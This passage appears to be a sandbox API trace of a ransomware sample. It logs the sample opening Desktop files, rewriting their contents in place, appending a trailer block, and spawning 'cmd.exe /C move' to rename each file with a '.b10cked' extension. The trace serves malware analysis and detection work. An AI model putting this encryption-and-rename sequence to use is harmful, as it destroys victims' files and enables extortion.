(in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x88c [0228.491] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xd74 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xd74 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.493] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x6b9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x6b9, lpOverlapped=0x0) returned 1 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.493] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x6b9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x6b9, lpOverlapped=0x0) returned 1 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1721, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6bb [0228.493] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x6b9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x6b9, lpOverlapped=0x0) returned 1 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1721, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6bb [0228.493] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x6b9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x6b9, lpOverlapped=0x0) returned 1 [0228.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Q--qnZ17d.bmp", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0228.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Q--qnZ17d.bmp", cchWideChar=13, lpMultiByteStr=0x131324c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q--qnZ17d.bmp", lpUsedDefaultChar=0x0) returned 13 [0228.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xd74 [0228.498] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.498] CloseHandle (hObject=0x1b4) returned 1 [0228.499] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP") returned 0x33 [0228.500] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0228.500] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x308, dwThreadId=0x42c)) returned 1 [0228.502] CloseHandle (hObject=0x120) returned 1 [0228.502] CloseHandle (hObject=0x1b4) returned 1 [0228.502] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.502] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.502] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 2 [0228.502] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.502] ReleaseMutex (hMutex=0xf8) returned 1 [0228.502] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.502] ReleaseMutex (hMutex=0xf8) returned 1 [0228.502] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.503] ReleaseMutex (hMutex=0xf8) returned 1 [0228.503] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.503] ReleaseMutex (hMutex=0xf8) returned 1 [0228.503] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfedoy9zi_en.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.503] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28529246610) returned 1 [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x5cc4 [0228.505] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x61ac [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x61ac [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.507] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x30d5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x30d5, lpOverlapped=0x0) returned 1 [0228.507] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.507] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x30d5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x30d5, lpOverlapped=0x0) returned 1 [0228.507] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-12501, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x30d7 [0228.507] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x30d5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x30d5, lpOverlapped=0x0) returned 1 [0228.507] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-12501, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x30d7 [0228.507] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x30d5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x30d5, lpOverlapped=0x0) returned 1 [0228.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mPZFEDoY9Zi_en.flv", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0228.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mPZFEDoY9Zi_en.flv", cchWideChar=18, lpMultiByteStr=0x1328794, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mPZFEDoY9Zi_en.flv", lpUsedDefaultChar=0x0) returned 18 [0228.512] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x61ac [0228.512] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.512] CloseHandle (hObject=0x1b4) returned 1 [0228.513] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV") returned 0x25 [0228.513] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0228.513] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x930, dwThreadId=0xf98)) returned 1 [0228.614] CloseHandle (hObject=0x120) returned 1 [0228.615] CloseHandle (hObject=0x1b4) returned 1 [0228.615] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.615] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.615] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 1 [0228.615] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.615] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.615] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0228.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.615] ReleaseMutex (hMutex=0xf8) returned 1 [0228.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.615] ReleaseMutex (hMutex=0xf8) returned 1 [0228.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.615] ReleaseMutex (hMutex=0xf8) returned 1 [0228.615] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.615] ReleaseMutex (hMutex=0xf8) returned 1 [0228.615] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqhv i4ofxmn5_1.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.615] SetFilePointer (in: 